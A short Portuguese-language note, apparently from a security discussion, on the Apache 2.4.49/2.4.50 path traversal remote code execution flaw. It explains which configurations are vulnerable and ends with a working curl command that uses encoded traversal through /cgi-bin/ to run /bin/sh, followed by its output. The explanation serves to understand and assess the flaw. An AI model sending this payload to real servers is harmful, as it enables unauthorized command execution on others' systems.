
Exploit de Execução Remota de Código para servidores Apache. Versões afetadas: Apache 2.4.49, Apache 2.4.50
IMHO apenas configurações "especiais" serão vulneráveis a este RCE.
O mesmo acontece para os exploits de "leitura arbitrária de arquivos" que você viu.
Ambos os CVEs são de fato quase a mesma vulnerabilidade de path traversal (o segundo é a correção incompleta do primeiro).
Path traversal só funciona a partir de uma URI mapeada (ex.: via diretivas "Alias" ou "ScriptAlias" do Apache). Apenas DocumentRoot não é suficiente.
"/cgi-bin/" é mapeado por padrão (ScriptAlias), então é por isso que está sendo usado antes da string de path traversal.
Além disso, ScriptAlias marca como Exec (para o Apache) todo o conteúdo do diretório especificado (independentemente das extensões de arquivo).
1/ mod_cgi habilitado (não padrão, mas fácil)
2/ o binário alvo deve ser +x (padrão para /bin/sh)
3/ permissões do Apache concedidas para /bin ou / (não padrão e difícil/irreal)
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)